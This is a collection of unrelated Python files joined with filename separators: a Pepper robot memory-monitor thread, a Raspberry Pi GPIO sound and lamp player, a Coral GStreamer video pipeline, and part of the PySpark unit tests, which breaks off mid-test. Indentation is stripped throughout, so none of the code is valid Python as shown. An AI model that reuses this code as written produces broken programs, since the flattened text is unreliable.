def get_token():
# Authentication token. The flask server is only spun up transiently to
# obtain a token.
TOKEN = None
server_process = Thread(target=app.run, kwargs={"host": HOST, "port": PORT})
server_process.start()
webbrowser.open_new_tab(HOME_URI)
while TOKEN is None:
time.sleep(0.1)
return TOKEN
|
alltasksconfirmed.py
|
import qi
import argparse
import sys
import time
import threading
import os
import conditions
from conditions import set_condition
monitorThread = None
def rhMonitorThread (memory_service):
t = threading.currentThread()
while getattr(t, "do_run", True):
try:
value = memory_service.getData("tasks_to_confirm")
except RuntimeError:
# the variable is not declared yet, so it is false
#print "ERROR retrieving value"
value = 1
if (value):
v = 'false'
else:
v = 'true'
set_condition(memory_service,'alltasksconfirmed',v)
print "alltasksconfirmed thread quit"
def init(session):
global monitorThread
print "alltasksconfirmed init"
#Starting services
memory_service = session.service("ALMemory")
#create a thead that monitors directly the signal
monitorThread = threading.Thread(target = rhMonitorThread, args = (memory_service,))
monitorThread.start()
def quit():
global monitorThread
print "alltasksconfirmed quit"
monitorThread.do_run = False
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--pip", type=str, default=os.environ['PEPPER_IP'],
help="Robot IP address. On robot or Local Naoqi: use '127.0.0.1'.")
parser.add_argument("--pport", type=int, default=9559,
help="Naoqi port number")
args = parser.parse_args()
pip = args.pip
pport = args.pport
#Starting application
try:
connection_url = "tcp://" + pip + ":" + str(pport)
app = qi.Application(["alltasksconfirmed", "--qi-url=" + connection_url ])
except RuntimeError:
print ("Can't connect to Naoqi at ip \"" + pip + "\" on port " + str(pport) +".\n"
"Please check your script arguments. Run with -h option for help.")
sys.exit(1)
app.start()
session = app.session
init(session)
#Program stays at this point until we stop it
app.run()
quit()
if __name__ == "__main__":
main()
|
main.py
|
import RPi.GPIO as GPIO
import pygame
from threading import Thread
import time
import smbus
import csv
pin_count = 12
pins = [
5, 6, 12, 16,
17, 18, 22, 23,
24, 25, 26, 27
]
is_playing = [False for i in range(0, pin_count)]
keys_pressed = 0
cur_ptrn_id = 0
addr_1 = 0x38
addr_2 = 0x39
patterns = []
def bytes_from_file(filename, chunksize=8192):
with open(filename, "rb") as f:
while True:
chunk = f.read(chunksize)
if chunk:
for b in chunk:
yield b
else:
break
def i2c_thread():
global keys_pressed
global cur_ptrn_id
global patterns
cleared = False
try:
bus = smbus.SMBus(1)
while(True):
if (keys_pressed > 0):
bus.write_i2c_block_data(addr_1, 0, [patterns[cur_ptrn_id][0]])
bus.write_i2c_block_data(addr_2, 0, [patterns[cur_ptrn_id][1]])
cur_ptrn_id += 1
if cur_ptrn_id == len(patterns):
cur_ptrn_id = 0
time.sleep(patterns[cur_ptrn_id][2])
cleared = False
if (keys_pressed == 0 and not cleared):
cleared = True
bus.write_i2c_block_data(addr_1, 0, [0x00])
bus.write_i2c_block_data(addr_2, 0, [0x00])
except:
print("I2C Error")
if __name__ == "__main__":
GPIO.setmode(GPIO.BCM)
FILENAME = "lamps.csv"
with open(FILENAME, "r", newline="") as file:
reader = csv.reader(file)
for row in reader:
x = 0
y = 0
for c in row[0].split():
if int(c) <= 6:
x |= 1 << (int(c) - 1)
else:
y |= 1 << (int(c) - 7)
patterns.append([x, y, float(row[1])])
pygame.init()
launch_sound = pygame.mixer.Sound("/home/pi/audio/start.ogg")
launch_sound.play()
print(len(patterns))
print(patterns)
for pin in pins:
GPIO.setup(pin, GPIO.IN)
thread = Thread(target = i2c_thread)
thread.start()
sounds = [pygame.mixer.Sound("/home/pi/audio/audio_" + str(i) + ".ogg") for i in range(1, pin_count+1)]
try:
while(True):
for i in range(0, pin_count):
if GPIO.input(pins[i]) == 1:
if not is_playing[i]:
is_playing[i] = True
sounds[i].play(-1)
keys_pressed += 1
else:
if is_playing[i]:
is_playing[i] = False
sounds[i].fadeout(700)
keys_pressed -= 1
except:
print("Bye")
GPIO.cleanup()
|
gstreamer.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from gi.repository import GLib, GObject, Gst, GstBase, GstVideo, Gtk
import gi
import numpy as np
import sys
import threading
import time
gi.require_version('Gst', '1.0')
gi.require_version('GstBase', '1.0')
gi.require_version('GstVideo', '1.0')
gi.require_version('Gtk', '3.0')
Gst.init(None)
class GstPipeline:
def __init__(self, pipeline, inf_callback, render_callback, src_size):
self.inf_callback = inf_callback
self.render_callback = render_callback
self.running = False
self.gstbuffer = None
self.output = None
self.sink_size = None
self.src_size = src_size
self.box = None
self.condition = threading.Condition()
self.pipeline = Gst.parse_launch(pipeline)
self.freezer = self.pipeline.get_by_name('freezer')
self.overlay = self.pipeline.get_by_name('overlay')
self.overlaysink = self.pipeline.get_by_name('overlaysink')
appsink = self.pipeline.get_by_name('appsink')
appsink.connect('new-sample', self.on_new_sample)
# Set up a pipeline bus watch to catch errors.
bus = self.pipeline.get_bus()
bus.add_signal_watch()
bus.connect('message', self.on_bus_message)
# Set up a full screen window on Coral, no-op otherwise.
self.setup_window()
def run(self):
# Start inference worker.
self.running = True
inf_worker = threading.Thread(target=self.inference_loop)
inf_worker.start()
render_worker = threading.Thread(target=self.render_loop)
render_worker.start()
# Run pipeline.
self.pipeline.set_state(Gst.State.PLAYING)
self.pipeline.get_state(Gst.CLOCK_TIME_NONE)
# We're high latency on higher resolutions, don't drop our late frames.
if self.overlaysink:
sinkelement = self.overlaysink.get_by_interface(GstVideo.VideoOverlay)
else:
sinkelement = self.pipeline.get_by_interface(GstVideo.VideoOverlay)
sinkelement.set_property('sync', False)
sinkelement.set_property('qos', False)
try:
Gtk.main()
except:
pass
# Clean up.
self.pipeline.set_state(Gst.State.NULL)
while GLib.MainContext.default().iteration(False):
pass
with self.condition:
self.running = False
self.condition.notify_all()
inf_worker.join()
render_worker.join()
def on_bus_message(self, bus, message):
t = message.type
if t == Gst.MessageType.EOS:
Gtk.main_quit()
elif t == Gst.MessageType.WARNING:
err, debug = message.parse_warning()
sys.stderr.write('Warning: %s: %s\n' % (err, debug))
elif t == Gst.MessageType.ERROR:
err, debug = message.parse_error()
sys.stderr.write('Error: %s: %s\n' % (err, debug))
Gtk.main_quit()
return True
def on_new_sample(self, sink):
sample = sink.emit('pull-sample')
if not self.sink_size:
s = sample.get_caps().get_structure(0)
self.sink_size = (s.get_value('width'), s.get_value('height'))
with self.condition:
self.gstbuffer = sample.get_buffer()
self.condition.notify_all()
return Gst.FlowReturn.OK
def get_box(self):
if not self.box:
glbox = self.pipeline.get_by_name('glbox')
if glbox:
glbox = glbox.get_by_name('filter')
box = self.pipeline.get_by_name('box')
assert glbox or box
assert self.sink_size
if glbox:
self.box = (glbox.get_property('x'), glbox.get_property('y'),
glbox.get_property('width'), glbox.get_property('height'))
else:
self.box = (-box.get_property('left'), -box.get_property('top'),
self.sink_size[0] + box.get_property('left') + box.get_property('right'),
self.sink_size[1] + box.get_property('top') + box.get_property('bottom'))
return self.box
def inference_loop(self):
while True:
with self.condition:
while not self.gstbuffer and self.running:
self.condition.wait()
if not self.running:
break
gstbuffer = self.gstbuffer
self.gstbuffer = None
# Input tensor is expected to be tightly packed, that is,
# width and stride in pixels are expected to be the same.
# For the Coral devboard using GPU this will always be true,
# but when using generic GStreamer CPU based elements the line
# stride will always be a multiple of 4 bytes in RGB format.
# In case of mismatch we have to copy the input line by line.
# For best performance input tensor size should take this
# into account when using CPU based elements.
# TODO: Use padded posenet models to avoid this.
meta = GstVideo.buffer_get_video_meta(gstbuffer)
assert meta and meta.n_planes == 1
bpp = 3 # bytes per pixel.
buf_stride = meta.stride[0] # 0 for first and only plane.
inf_stride = meta.width * bpp
if inf_stride == buf_stride:
# Fast case, pass buffer as input tensor as is.
input_tensor = gstbuffer
else:
# Slow case, need to pack lines tightly (copy).
result, mapinfo = gstbuffer.map(Gst.MapFlags.READ)
assert result
data_view = memoryview(mapinfo.data)
input_tensor = bytearray(inf_stride * meta.height)
src_offset = dst_offset = 0
for row in range(meta.height):
src_end = src_offset + inf_stride
dst_end = dst_offset + inf_stride
input_tensor[dst_offset : dst_end] = data_view[src_offset : src_end]
src_offset += buf_stride
dst_offset += inf_stride
input_tensor = bytes(input_tensor)
gstbuffer.unmap(mapinfo)
output = self.inf_callback(input_tensor)
with self.condition:
self.output = output
self.condition.notify_all()
def render_loop(self):
while True:
with self.condition:
while not self.output and self.running:
self.condition.wait()
if not self.running:
break
output = self.output
self.output = None
svg, freeze = self.render_callback(output, self.src_size, self.get_box())
self.freezer.frozen = freeze
if self.overlaysink:
self.overlaysink.set_property('svg', svg)
elif self.overlay:
self.overlay.set_property('data', svg)
def setup_window(self):
# Only set up our own window if we have Coral overlay sink in the pipeline.
if not self.overlaysink:
return
gi.require_version('GstGL', '1.0')
from gi.repository import GstGL
# Needed to commit the wayland sub-surface.
def on_gl_draw(sink, widget):
widget.queue_draw()
# Needed to account for window chrome etc.
def on_widget_configure(widget, event, overlaysink):
allocation = widget.get_allocation()
overlaysink.set_render_rectangle(allocation.x, allocation.y,
allocation.width, allocation.height)
return False
window = Gtk.Window(Gtk.WindowType.TOPLEVEL)
window.fullscreen()
drawing_area = Gtk.DrawingArea()
window.add(drawing_area)
drawing_area.realize()
self.overlaysink.connect('drawn', on_gl_draw, drawing_area)
# Wayland window handle.
wl_handle = self.overlaysink.get_wayland_window_handle(drawing_area)
self.overlaysink.set_window_handle(wl_handle)
# Wayland display context wrapped as a GStreamer context.
wl_display = self.overlaysink.get_default_wayland_display_context()
self.overlaysink.set_context(wl_display)
drawing_area.connect('configure-event', on_widget_configure, self.overlaysink)
window.connect('delete-event', Gtk.main_quit)
window.show_all()
# The appsink pipeline branch must use the same GL display as the screen
# rendering so they get the same GL context. This isn't automatically handled
# by GStreamer as we're the ones setting an external display handle.
def on_bus_message_sync(bus, message, overlaysink):
if message.type == Gst.MessageType.NEED_CONTEXT:
_, context_type = message.parse_context_type()
if context_type == GstGL.GL_DISPLAY_CONTEXT_TYPE:
sinkelement = overlaysink.get_by_interface(GstVideo.VideoOverlay)
gl_context = sinkelement.get_property('context')
if gl_context:
display_context = Gst.Context.new(GstGL.GL_DISPLAY_CONTEXT_TYPE, True)
GstGL.context_set_gl_display(display_context, gl_context.get_display())
message.src.set_context(display_context)
return Gst.BusSyncReply.PASS
bus = self.pipeline.get_bus()
bus.set_sync_handler(on_bus_message_sync, self.overlaysink)
def on_bus_message(bus, message, loop):
t = message.type
if t == Gst.MessageType.EOS:
loop.quit()
elif t == Gst.MessageType.WARNING:
err, debug = message.parse_warning()
sys.stderr.write('Warning: %s: %s\n' % (err, debug))
elif t == Gst.MessageType.ERROR:
err, debug = message.parse_error()
sys.stderr.write('Error: %s: %s\n' % (err, debug))
loop.quit()
return True
def detectCoralDevBoard():
try:
if 'MX8MQ' in open('/sys/firmware/devicetree/base/model').read():
print('Detected Edge TPU dev board.')
return True
except:
pass
return False
class Freezer(GstBase.BaseTransform):
__gstmetadata__ = ('<longname>', '<class>', '<description>', '<author>')
__gsttemplates__ = (Gst.PadTemplate.new('sink',
Gst.PadDirection.SINK,
Gst.PadPresence.ALWAYS,
Gst.Caps.new_any()),
Gst.PadTemplate.new('src',
Gst.PadDirection.SRC,
Gst.PadPresence.ALWAYS,
Gst.Caps.new_any())
)
def __init__(self):
self.buf = None
self.frozen = False
self.set_passthrough(False)
def do_prepare_output_buffer(self, inbuf):
if self.frozen:
if not self.buf:
self.buf = inbuf
src_buf = self.buf
else:
src_buf = inbuf
buf = Gst.Buffer.new()
buf.copy_into(src_buf, Gst.BufferCopyFlags.FLAGS | Gst.BufferCopyFlags.TIMESTAMPS |
Gst.BufferCopyFlags.META | Gst.BufferCopyFlags.MEMORY, 0, inbuf.get_size())
buf.pts = inbuf.pts
return (Gst.FlowReturn.OK, buf)
def do_transform(self, inbuf, outbuf):
return Gst.FlowReturn.OK
def register_elements(plugin):
gtype = GObject.type_register(Freezer)
Gst.Element.register(plugin, 'freezer', 0, gtype)
return True
Gst.Plugin.register_static(
Gst.version()[0], Gst.version()[1], # GStreamer version
'', # name
'', # description
register_elements, # init_func
'', # version
'unknown', # license
'', # source
'', # package
'' # origin
)
def run_pipeline(inf_callback, render_callback, src_size,
inference_size,
mirror=False,
h264=False,
jpeg=False,
videosrc='/dev/video0'):
if h264:
SRC_CAPS = 'video/x-h264,width={width},height={height},framerate=30/1'
elif jpeg:
SRC_CAPS = 'image/jpeg,width={width},height={height},framerate=30/1'
else:
SRC_CAPS = 'video/x-raw,width={width},height={height},framerate=30/1'
PIPELINE = 'v4l2src device=%s ! {src_caps}' % videosrc
scale = min(inference_size[0] / src_size[0],
inference_size[1] / src_size[1])
scale = tuple(int(x * scale) for x in src_size)
scale_caps = 'video/x-raw,width={width},height={height}'.format(
width=scale[0], height=scale[1])
PIPELINE += """ ! decodebin ! videoflip video-direction={direction} ! tee name=t
t. ! {leaky_q} ! videoconvert ! freezer name=freezer ! rsvgoverlay name=overlay
! videoconvert ! autovideosink
t. ! {leaky_q} ! videoconvert ! videoscale ! {scale_caps} ! videobox name=box autocrop=true
! {sink_caps} ! {sink_element}
"""
#TODO: Fix pipeline for the dev board.
SINK_ELEMENT = 'appsink name=appsink emit-signals=true max-buffers=1 drop=true'
SINK_CAPS = 'video/x-raw,format=RGB,width={width},height={height}'
LEAKY_Q = 'queue max-size-buffers=1 leaky=downstream'
direction = 'horiz' if mirror else 'identity'
src_caps = SRC_CAPS.format(width=src_size[0], height=src_size[1])
sink_caps = SINK_CAPS.format(width=inference_size[0], height=inference_size[1])
pipeline = PIPELINE.format(src_caps=src_caps, sink_caps=sink_caps,
sink_element=SINK_ELEMENT, direction=direction, leaky_q=LEAKY_Q, scale_caps=scale_caps)
print('Gstreamer pipeline: ', pipeline)
pipeline = GstPipeline(pipeline, inf_callback, render_callback, src_size)
pipeline.run()
|
tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for PySpark; additional tests are implemented as doctests in
individual modules.
"""
from array import array
from glob import glob
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import zipfile
import random
import threading
import hashlib
from py4j.protocol import Py4JJavaError
try:
import xmlrunner
except ImportError:
xmlrunner = None
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
if sys.version_info[0] >= 3:
xrange = range
basestring = str
if sys.version >= "3":
from io import StringIO
else:
from StringIO import StringIO
from pyspark import keyword_only
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.rdd import RDD
from pyspark.files import SparkFiles
from pyspark.serializers import read_int, BatchedSerializer, MarshalSerializer, PickleSerializer, \
CloudPickleSerializer, CompressedSerializer, UTF8Deserializer, NoOpSerializer, \
PairDeserializer, CartesianDeserializer, AutoBatchedSerializer, AutoSerializer, \
FlattenedValuesSerializer
from pyspark.shuffle import Aggregator, ExternalMerger, ExternalSorter
from pyspark import shuffle
from pyspark.profiler import BasicProfiler
from pyspark.taskcontext import TaskContext
_have_scipy = False
_have_numpy = False
try:
import scipy.sparse
_have_scipy = True
except:
# No SciPy, but that's okay, we'll skip those tests
pass
try:
import numpy as np
_have_numpy = True
except:
# No NumPy, but that's okay, we'll skip those tests
pass
SPARK_HOME = os.environ["SPARK_HOME"]
class MergerTests(unittest.TestCase):
def setUp(self):
self.N = 1 << 12
self.l = [i for i in xrange(self.N)]
self.data = list(zip(self.l, self.l))
self.agg = Aggregator(lambda x: [x],
lambda x, y: x.append(y) or x,
lambda x, y: x.extend(y) or x)
def test_small_dataset(self):
m = ExternalMerger(self.agg, 1000)
m.mergeValues(self.data)
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 1000)
m.mergeCombiners(map(lambda x_y1: (x_y1[0], [x_y1[1]]), self.data))
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
def test_medium_dataset(self):
m = ExternalMerger(self.agg, 20)
m.mergeValues(self.data)
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda x_y2: (x_y2[0], [x_y2[1]]), self.data * 3))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)) * 3)
def test_huge_dataset(self):
m = ExternalMerger(self.agg, 5, partitions=3)
m.mergeCombiners(map(lambda k_v: (k_v[0], [str(k_v[1])]), self.data * 10))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(len(v) for k, v in m.items()),
self.N * 10)
m._cleanup()
def test_group_by_key(self):
def gen_data(N, step):
for i in range(1, N + 1, step):
for j in range(i):
yield (i, [j])
def gen_gs(N, step=1):
return shuffle.GroupByKey(gen_data(N, step))
self.assertEqual(1, len(list(gen_gs(1))))
self.assertEqual(2, len(list(gen_gs(2))))
self.assertEqual(100, len(list(gen_gs(100))))
self.assertEqual(list(range(1, 101)), [k for k, _ in gen_gs(100)])
self.assertTrue(all(list(range(k)) == list(vs) for k, vs in gen_gs(100)))
for k, vs in gen_gs(50002, 10000):
self.assertEqual(k, len(vs))
self.assertEqual(list(range(k)), list(vs))
ser = PickleSerializer()
l = ser.loads(ser.dumps(list(gen_gs(50002, 30000))))
for k, vs in l:
self.assertEqual(k, len(vs))
self.assertEqual(list(range(k)), list(vs))
class SorterTests(unittest.TestCase):
def test_in_memory_sort(self):
l = list(range(1024))
random.shuffle(l)
sorter = ExternalSorter(1024)
self.assertEqual(sorted(l), list(sorter.sorted(l)))
self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertEqual(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
def test_external_sort(self):
class CustomizedSorter(ExternalSorter):
def _next_limit(self):
return self.memory_limit
l = list(range(1024))
random.shuffle(l)
sorter = CustomizedSorter(1)
self.assertEqual(sorted(l), list(sorter.sorted(l)))
self.assertGreater(shuffle.DiskBytesSpilled, 0)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
def test_external_sort_in_rdd(self):
conf = SparkConf().set("spark.python.worker.memory", "1m")
sc = SparkContext(conf=conf)
l = list(range(10240))
random.shuffle(l)
rdd = sc.parallelize(l, 4)
self.assertEqual(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class SerializationTestCase(unittest.TestCase):
def test_namedtuple(self):
from collections import namedtuple
from pickle import dumps, loads
P = namedtuple("P", "x y")
p1 = P(1, 3)
p2 = loads(dumps(p1, 2))
self.assertEqual(p1, p2)
from pyspark.cloudpickle import dumps
P2 = loads(dumps(P))
p3 = P2(1, 3)
self.assertEqual(p1, p3)
def test_itemgetter(self):
from operator import itemgetter
ser = CloudPickleSerializer()
d = range(10)
getter = itemgetter(1)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = itemgetter(0, 3)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
def test_function_module_name(self):
ser = CloudPickleSerializer()
func = lambda x: x
func2 = ser.loads(ser.dumps(func))
self.assertEqual(func.__module__, func2.__module__)
def test_attrgetter(self):
from operator import attrgetter
ser = CloudPickleSerializer()
class C(object):
def __getattr__(self, item):
return item
d = C()
getter = attrgetter("a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("a", "b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
d.e = C()
getter = attrgetter("e.a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("e.a", "e.b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
# Regression test for SPARK-3415
def test_pickling_file_handles(self):
# to be corrected with SPARK-11160
if not xmlrunner:
ser = CloudPickleSerializer()
out1 = sys.stderr
out2 = ser.loads(ser.dumps(out1))
self.assertEqual(out1, out2)
def test_func_globals(self):
class Unpicklable(object):
def __reduce__(self):
raise Exception("not picklable")
global exit
exit = Unpicklable()
ser = CloudPickleSerializer()
self.assertRaises(Exception, lambda: ser.dumps(exit))
def foo():
sys.exit(0)
self.assertTrue("exit" in foo.__code__.co_names)
ser.dumps(foo)
def test_compressed_serializer(self):
ser = CompressedSerializer(PickleSerializer())
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO as StringIO
io = StringIO()
ser.dump_stream(["abc", u"123", range(5)], io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)], list(ser.load_stream(io)))
ser.dump_stream(range(1000), io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)] + list(range(1000)), list(ser.load_stream(io)))
io.close()
def test_hash_serializer(self):
hash(NoOpSerializer())
hash(UTF8Deserializer())
hash(PickleSerializer())
hash(MarshalSerializer())
hash(AutoSerializer())
hash(BatchedSerializer(PickleSerializer()))
hash(AutoBatchedSerializer(MarshalSerializer()))
hash(PairDeserializer(NoOpSerializer(), UTF8Deserializer()))
hash(CartesianDeserializer(NoOpSerializer(), UTF8Deserializer()))
hash(CompressedSerializer(PickleSerializer()))
hash(FlattenedValuesSerializer(PickleSerializer()))
class QuietTest(object):
def __init__(self, sc):
self.log4j = sc._jvm.org.apache.log4j
def __enter__(self):
self.old_level = self.log4j.LogManager.getRootLogger().getLevel()
self.log4j.LogManager.getRootLogger().setLevel(self.log4j.Level.FATAL)
def __exit__(self, exc_type, exc_val, exc_tb):
self.log4j.LogManager.getRootLogger().setLevel(self.old_level)
class PySparkTestCase(unittest.TestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
self.sc = SparkContext('local[4]', class_name)
def tearDown(self):
self.sc.stop()
sys.path = self._old_sys_path
class ReusedPySparkTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.sc = SparkContext('local[4]', cls.__name__)
@classmethod
def tearDownClass(cls):
cls.sc.stop()
class CheckpointTests(ReusedPySparkTestCase):
def setUp(self):
self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.checkpointDir.name)
self.sc.setCheckpointDir(self.checkpointDir.name)
def tearDown(self):
shutil.rmtree(self.checkpointDir.name)
def test_basic_checkpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
self.assertEqual("file:" + self.checkpointDir.name,
os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile())))
def test_checkpoint_and_restore(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: [x])
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
flatMappedRDD.count() # forces a checkpoint to be computed
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.getCheckpointFile() is not None)
recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(),
flatMappedRDD._jrdd_deserializer)
self.assertEqual([1, 2, 3, 4], recovered.collect())
class LocalCheckpointTests(ReusedPySparkTestCase):
def test_basic_localcheckpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertFalse(flatMappedRDD.isLocallyCheckpointed())
flatMappedRDD.localCheckpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.isLocallyCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
class AddFileTests(PySparkTestCase):
def test_add_py_file(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this job fails due to `userlibrary` not being on the Python path:
# disable logging in log4j temporarily
def func(x):
from userlibrary import UserClass
return UserClass().hello()
with QuietTest(self.sc):
self.assertRaises(Exception, self.sc.parallelize(range(2)).map(func).first)
# Add the file, so the job should now succeed:
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
res = self.sc.parallelize(range(2)).map(func).first()
self.assertEqual("Hello World!", res)
def test_add_file_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
self.sc.addFile(path)
download_path = SparkFiles.get("hello.txt")
self.assertNotEqual(path, download_path)
with open(download_path) as test_file:
self.assertEqual("Hello World!\n", test_file.readline())
def test_add_file_recursively_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello")
self.sc.addFile(path, True)
download_path = SparkFiles.get("hello")
self.assertNotEqual(path, download_path)
with open(download_path + "/hello.txt") as test_file:
self.assertEqual("Hello World!\n", test_file.readline())
with open(download_path + "/sub_hello/sub_hello.txt") as test_file:
self.assertEqual("Sub Hello World!\n", test_file.readline())
def test_add_py_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlibrary import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
from userlibrary import UserClass
self.assertEqual("Hello World!", UserClass().hello())
def test_add_egg_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlib import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1.zip")
self.sc.addPyFile(path)
from userlib import UserClass
self.assertEqual("Hello World from inside a package!", UserClass().hello())
def test_overwrite_system_module(self):
self.sc.addPyFile(os.path.join(SPARK_HOME, "python/test_support/SimpleHTTPServer.py"))
import SimpleHTTPServer
self.assertEqual("My Server", SimpleHTTPServer.__name__)
def func(x):
import SimpleHTTPServer
return SimpleHTTPServer.__name__
self.assertEqual(["My Server"], self.sc.parallelize(range(1)).map(func).collect())
class TaskContextTests(PySparkTestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
# Allow retries even though they are normally disabled in local mode
self.sc = SparkContext('local[4, 2]', class_name)
def test_stage_id(self):
"""Test the stage ids are available and incrementing as expected."""
rdd = self.sc.parallelize(range(10))
stage1 = rdd.map(lambda x: TaskContext.get().stageId()).take(1)[0]
stage2 = rdd.map(lambda x: TaskContext.get().stageId()).take(1)[0]
# Test using the constructor directly rather than the get()
stage3 = rdd.map(lambda x: TaskContext().stageId()).take(1)[0]
self.assertEqual(stage1 + 1, stage2)
self.assertEqual(stage1 + 2, stage3)
self.assertEqual(stage2 + 1, stage3)
def test_partition_id(self):
"""Test the partition id."""
rdd1 = self.sc.parallelize(range(10), 1)
rdd2 = self.sc.parallelize(range(10), 2)
pids1 = rdd1.map(lambda x: TaskContext.get().partitionId()).collect()
pids2 = rdd2.map(lambda x: TaskContext.get().partitionId()).collect()
self.assertEqual(0, pids1[0])
self.assertEqual(0, pids1[9])
self.assertEqual(0, pids2[0])
self.assertEqual(1, pids2[9])
def test_attempt_number(self):
"""Verify the attempt numbers are correctly reported."""
rdd = self.sc.parallelize(range(10))
# Verify a simple job with no failures
attempt_numbers = rdd.map(lambda x: TaskContext.get().attemptNumber()).collect()
map(lambda attempt: self.assertEqual(0, attempt), attempt_numbers)
def fail_on_first(x):
"""Fail on the first attempt so we get a positive attempt number"""
tc = TaskContext.get()
attempt_number = tc.attemptNumber()
partition_id = tc.partitionId()
attempt_id = tc.taskAttemptId()
if attempt_number == 0 and partition_id == 0:
raise Exception("Failing on first attempt")
else:
return [x, partition_id, attempt_number, attempt_id]
result = rdd.map(fail_on_first).collect()
# We should re-submit the first partition to it but other partitions should be attempt 0
self.assertEqual([0, 0, 1], result[0][0:3])
self.assertEqual([9, 3, 0], result[9][0:3])
first_partition = filter(lambda x: x[1] == 0, result)
map(lambda x: self.assertEqual(1, x[2]), first_partition)
other_partitions = filter(lambda x: x[1] != 0, result)
